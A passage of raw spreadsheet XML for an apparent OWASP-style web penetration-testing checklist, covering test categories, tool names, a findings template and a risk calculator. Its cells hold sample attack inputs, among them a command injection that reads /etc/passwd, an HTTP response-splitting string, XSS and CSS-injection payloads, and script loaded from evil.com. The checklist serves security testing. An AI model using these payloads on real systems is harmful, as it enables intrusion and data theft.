    <t xml:space="preserve">Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Commix</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-014</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Buffer overflow</t>
  </si>
  <si>
    <t xml:space="preserve">• Testing for heap overflow vulnerability
• Testing for stack overflow vulnerability
• Testing for format string vulnerability</t>
  </si>
  <si>
    <t xml:space="preserve">Immunity Canvas, Spike, MSF, Nessus</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Heap overflow</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Stack overflow</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Format string</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-015</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for incubated vulnerabilities</t>
  </si>
  <si>
    <t xml:space="preserve">File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, BeEF, MSF</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-016</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t xml:space="preserve">param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, netcat</t>
  </si>
  <si>
    <t xml:space="preserve">Error Handling</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-ERR-001</t>
  </si>
  <si>
    <t xml:space="preserve">Analysis of Error Codes</t>
  </si>
  <si>
    <t xml:space="preserve">Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-ERR-002</t>
  </si>
  <si>
    <t xml:space="preserve">Analysis of Stack Traces</t>
  </si>
  <si>
    <t xml:space="preserve">• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syn
tax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t xml:space="preserve">Cryptography</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CRYPST-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection</t>
  </si>
  <si>
    <t xml:space="preserve">Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t xml:space="preserve">testssl.sh, SSL Breacher</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CRYPST-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Padding Oracle</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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 xml:space="preserve">PadBuster, Poracle, python-paddingoracle, POET</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CRYPST-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Sensitive information sent via unencrypted channels</t>
  </si>
  <si>
    <t xml:space="preserve">Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Curl</t>
  </si>
  <si>
    <t xml:space="preserve">Business logic Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC-001</t>
  </si>
  <si>
    <t xml:space="preserve">Test Business Logic Data Validation</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC-002</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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OTG-BUSLOGIC-003</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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xml:space="preserve">OTG-BUSLOGIC-004</t>
  </si>
  <si>
    <t xml:space="preserve">Test for Process Timing</t>
  </si>
  <si>
    <t xml:space="preserve">•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</si>
  <si>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OTG-BUSLOGIC-005</t>
  </si>
  <si>
    <t xml:space="preserve">Test Number of Times a Function Can be Used Limits</t>
  </si>
  <si>
    <t xml:space="preserve">•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</si>
  <si>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xml:space="preserve">OTG-BUSLOGIC-006</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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xml:space="preserve">OTG-BUSLOGIC-007</t>
  </si>
  <si>
    <t xml:space="preserve">Test Defenses Against Application Mis-use</t>
  </si>
  <si>
    <t xml:space="preserve">Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC-008</t>
  </si>
  <si>
    <t xml:space="preserve">Test Upload of Unexpected File Types</t>
  </si>
  <si>
    <t xml:space="preserve">•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</si>
  <si>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OTG-BUSLOGIC-009</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Client Side Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t xml:space="preserve">Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, DOMinator</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for JavaScript Execution</t>
  </si>
  <si>
    <t xml:space="preserve">Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for HTML Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Client Side URL Redirect</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-005</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for CSS Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-006</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Client Side Resource Manipulation</t>
  </si>
  <si>
    <t xml:space="preserve">External JavaScript could be easily injected in the trusted web site
www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-007</t>
  </si>
  <si>
    <t xml:space="preserve">Test Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t xml:space="preserve">Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-008</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Cross Site Flashing</t>
  </si>
  <si>
    <t xml:space="preserve">Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil</t>
  </si>
  <si>
    <t xml:space="preserve">FlashBang, Flare, Flasm, SWFScan, SWF Intruder</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-009</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Clickjacking</t>
  </si>
  <si>
    <t xml:space="preserve">Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ClickjackingTool</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-010</t>
  </si>
  <si>
    <t xml:space="preserve">Testing WebSockets</t>
  </si>
  <si>
    <t xml:space="preserve">Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.Use Google Chrome's Developer Tools to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, Chrome, ZAP, WebSocket Client</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-011</t>
  </si>
  <si>
    <t xml:space="preserve">Test Web Messaging</t>
  </si>
  <si>
    <t xml:space="preserve">Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-012</t>
  </si>
  <si>
    <t xml:space="preserve">Test Local Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Determine whether the website is storing sensitive data in the storage. XSS in localstorage 
http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Chrome, Firebug, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">Pass</t>
  </si>
  <si>
    <t xml:space="preserve">Issues</t>
  </si>
  <si>
    <t xml:space="preserve">N/A</t>
  </si>
  <si>
    <t xml:space="preserve">No.</t>
  </si>
  <si>
    <t xml:space="preserve">Vulnerability Name</t>
  </si>
  <si>
    <t xml:space="preserve"> OTG</t>
  </si>
  <si>
    <t xml:space="preserve">Affected Host/Path</t>
  </si>
  <si>
    <t xml:space="preserve">Impact</t>
  </si>
  <si>
    <t xml:space="preserve">Likelihood</t>
  </si>
  <si>
    <t xml:space="preserve">Risk</t>
  </si>
  <si>
    <t xml:space="preserve">Observation/Implication</t>
  </si>
  <si>
    <t xml:space="preserve">Recommendation</t>
  </si>
  <si>
    <t xml:space="preserve">Test Evidence</t>
  </si>
  <si>
    <t xml:space="preserve">SQL Injection</t>
  </si>
  <si>
    <t xml:space="preserve">www.example.com/news.php (id,page)</t>
  </si>
  <si>
    <t xml:space="preserve">High</t>
  </si>
  <si>
    <t xml:space="preserve">Moderate</t>
  </si>
  <si>
    <t xml:space="preserve">xxx-1</t>
  </si>
  <si>
    <t xml:space="preserve">OWASP Risk Assessment Calculator
Risk Assessment Calculator</t>
  </si>
  <si>
    <t xml:space="preserve">Likelihood factors</t>
  </si>
  <si>
    <t xml:space="preserve">Impact factors</t>
  </si>
  <si>
    <t xml:space="preserve">REF</t>
  </si>
  <si>
    <t xml:space="preserve">http://paradoslabs.nl/owaspcalc/index.php</t>
  </si>
  <si>
    <t xml:space="preserve">Threat Agent Factors</t>
  </si>
  <si>
    <t xml:space="preserve">Technical Impact Factors</t>
  </si>
  <si>
    <t xml:space="preserve">Skills required</t>
  </si>
  <si>
    <t xml:space="preserve">Some technical skills [3]</t>
  </si>
  <si>
    <t xml:space="preserve">Loss of confidentiality</t>
  </si>
  <si>
    <t xml:space="preserve">Minimal non-sensitive data disclosed [2]</t>
  </si>
  <si>
    <t xml:space="preserve">Motive</t>
  </si>
  <si>
    <t xml:space="preserve">Possible reward [4]</t>
  </si>
  <si>
    <t xml:space="preserve">Loss of Integrity</t>
  </si>
  <si>
    <t xml:space="preserve">All data totally corrupt [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">Full access or expensive resources required [0]</t>
  </si>
  <si>
    <t xml:space="preserve">Loss of Availability</t>
  </si>
  <si>
    <t xml:space="preserve">Minimal secondary services interrupted [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Population Size</t>
  </si>
  <si>
    <t xml:space="preserve">System Administrators [2]</t>
  </si>
  <si>
    <t xml:space="preserve">Loss of Accountability</t>
  </si>
  <si>
    <t xml:space="preserve">Not Applicable [0]</t>
  </si>
  <si>
    <t xml:space="preserve">Vulnerability Factors</t>
  </si>
  <si>
    <t xml:space="preserve">Business Impact Factors</t>
  </si>
  <si>
    <t xml:space="preserve">Easy of Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">Practically impossible [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Financial damage</t>
  </si>
  <si>
    <t xml:space="preserve">Minor effect on annual profit [3]</t>
  </si>
  <si>
    <t xml:space="preserve">Ease of Exploit</t>
  </si>
  <si>
    <t xml:space="preserve">Easy [5]</t>
  </si>
  <si>
    <t xml:space="preserve">Reputation damage</t>
  </si>
  <si>
    <t xml:space="preserve">Loss of major accounts [4]</t>
  </si>
  <si>
    <t xml:space="preserve">Awareness</t>
  </si>
  <si>
    <t xml:space="preserve">Hidden [4]</t>
  </si>
  <si>
    <t xml:space="preserve">Non-Compliance</t>
  </si>
  <si>
    <t xml:space="preserve">Clear violation [5]</t>
  </si>
  <si>
    <t xml:space="preserve">Intrusion Detection</t>
  </si>
  <si>
    <t xml:space="preserve">Logged and reviewed [3]</t>
  </si>
  <si>
    <t xml:space="preserve">Privacy violation</t>
  </si>
  <si>
    <t xml:space="preserve">One individual [3]</t>
  </si>
  <si>
    <t xml:space="preserve">Likelihood score:</t>
  </si>
  <si>
    <t xml:space="preserve">Impact score:</t>
  </si>
  <si>
    <t xml:space="preserve">Overall Risk Severity :</t>
  </si>
  <si>
    <t xml:space="preserve">Select an option</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t xml:space="preserve">No technical skills [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Low or no reward [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Special access or resources required [4]</t>
  </si>
  <si>
    <t xml:space="preserve">Theoretical [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Unknown [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Active detection in application [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Some access or resources required [7]</t>
  </si>
  <si>
    <t xml:space="preserve">Intranet Users [4]</t>
  </si>
  <si>
    <t xml:space="preserve">Difficult [3]</t>
  </si>
  <si>
    <t xml:space="preserve">Advanced computer user [5]</t>
  </si>
  <si>
    <t xml:space="preserve">High reward [9]</t>
  </si>
  <si>
    <t xml:space="preserve">No access or resources required [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Partners [5]</t>
  </si>
  <si>
    <t xml:space="preserve">Easy [7]</t>
  </si>
  <si>
    <t xml:space="preserve">Obvious [6]</t>
  </si>
  <si>
    <t xml:space="preserve">Logged without review [8]</t>
  </si>
  <si>
    <t xml:space="preserve">Network and programming skills [6]</t>
  </si>
  <si>
    <t xml:space="preserve">Authenticated users [6]</t>
  </si>
  <si>
    <t xml:space="preserve">Automated tools available [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Public knowledge [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Not logged [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Security penetration skills [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Anonymous Internet users [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Minimal slightly corrupt data [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Attack fully traceable to individual [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Damage costs less than to fix the issue [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Minimal damage [1]</t>
  </si>
  <si>
    <t xml:space="preserve">Minor violation [2]</t>
  </si>
  <si>
    <t xml:space="preserve">Extensive non-sensitive data disclosed [6]</t>
  </si>
  <si>
    <t xml:space="preserve">Minimal seriously corrupt data [3]</t>
  </si>
  <si>
    <t xml:space="preserve">Minimal primary services interrupted [5]</t>
  </si>
  <si>
    <t xml:space="preserve">Attack possibly traceable to individual [7]</t>
  </si>
  <si>
    <t xml:space="preserve">Hundreds of people [5]</t>
  </si>
  <si>
    <t xml:space="preserve">Extensive critical data disclosed [7]</t>
  </si>
  <si>
    <t xml:space="preserve">Extensive slightly corrupt data [5]</t>
  </si>
  <si>
    <t xml:space="preserve">Extensive primary services interrupted [7]</t>
  </si>
  <si>
    <t xml:space="preserve">Attack completely anonymous [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Significant effect on annual profit [7]</t>
  </si>
  <si>
    <t xml:space="preserve">Loss of goodwill [5]</t>
  </si>
  <si>
    <t xml:space="preserve">High profile violation [7]</t>
  </si>
  <si>
    <t xml:space="preserve">Thousands of people [7]</t>
  </si>
  <si>
    <t xml:space="preserve">All data disclosed [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Extensive seriously corrupt data [7]</t>
  </si>
  <si>
    <t xml:space="preserve">All services completely lost [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Backruptcy [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Brand damage [9]</t>
  </si>
  <si>
    <t xml:space="preserve">Millions of people [9]</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="2">
    <numFmt numFmtId="164" formatCode="General"/>
    <numFmt numFmtId="165" formatCode="General"/>
  </numFmts>
  <fonts count="24">
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="0"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Lato Heavy"/>
      <family val="0"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Lato Heavy"/>
      <family val="0"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="14"/>
      <name val="Lato Heavy"/>
      <family val="0"/>
      <charset val="1"/>
    </font>
    <font>
      <i val="true"/>
      <sz val="10"/>
      <name val="Lato Heavy"/>
      <family val="0"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="10"/>
      <name val="Lato Heavy"/>
      <family val="0"/>
      <charset val="1"/>
    </font>
    <font>
      <i val="true"/>
      <sz val="9"/>
      <color rgb="FF808080"/>
      <name val="Lato Heavy"/>
      <family val="0"/>
      <charset val="1"/>
    </font>
    <font>
      <i val="true"/>
      <sz val="10"/>
      <color rgb="FF808080"/>
      <name val="Lato Heavy"/>
      <family val="0"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Lato Heavy"/>
      <family val="0"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="16"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <i val="true"/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <i val="true"/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="20"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="11"/>
      <color rgb="FF333333"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="12"/>
      <color rgb="FF333333"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="14"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b val="true"/>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Tahoma"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
  </fonts>
  <fills count="10">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF8EB4E3"/>
        <bgColor rgb="FF9999FF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6D9F1"/>
        <bgColor rgb="FFC6EFCE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEEECE1"/>
        <bgColor rgb="FFFFFFFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor rgb="FFFFFF00"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF92D050"/>
        <bgColor rgb="FFC0C0C0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC000"/>
        <bgColor rgb="FFFF9900"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF0000"/>
        <bgColor rgb="FF993300"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF7030A0"/>
        <bgColor rgb="FF99336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2" borderId="2"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4" fillId="4"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center" vertical="bottom" textRotation="0" wrapText="true" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="164" fontId="12" fillId="6"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5" fontId="18"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5" fontId="19"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right" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="22"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6" borderId="0" xfId="0" applyFont="false" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="false" indent="0" shrinkToFit="false"/>
      <protection locked="true" hidden="false"/>
    </xf>
    <xf numFmtId="165" fontId="0" fillId="5" borderId="0" xfId="0" applyFont="false" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center"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8" borderId="0" xfId="0" applyFont="false" applyBorder="false" applyAlignment="true" applyProtection="false">
      <alignment horizontal="center"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ont>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFFF00"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF7030A0"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC6EFCE"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF7030A0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFF0000"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFC000"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFF00"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color rgb="FF92D050"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <i val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <i val="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EEECE1"/>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6EFCE"/>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able1" displayName="Table1" ref="A4:F14" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A4:F14"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Information Gathering"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Result"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table10.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="10" name="Table616" displayName="Table616" ref="A112:F124" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A112:F124"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Client Side Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Result"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table11.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="11" name="Table9" displayName="Table9" ref="A63:F90" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A63:F90"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Data Validation Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Result"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="2" name="Table2" displayName="Table2" ref="A16:F24" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A16:F24"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Configuration and Deploy Management Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Result"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table3.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="3" name="Table29" displayName="Table29" ref="A26:F33" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A26:F33"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Identity Management Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Result"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table4.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="4" name="Table3" displayName="Table3" ref="A35:F45" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A35:F45"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Authentication Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Result"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table5.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="5" name="Table4" displayName="Table4" ref="A53:F61" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A53:F61"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Session Management Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Result"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table6.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="6" name="Table5" displayName="Table5" ref="A47:F51" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A47:F51"/>
  <tableColumns count="6">
    <tableColumn id="1" name="Authorization Testing "/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Result"/>
    <tableColumn id="6" name="Remark"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table7.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="7" name="Table6" displayName="Table6" ref="A101:F110" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A101:F110"/>
  <tableColumns count="6">
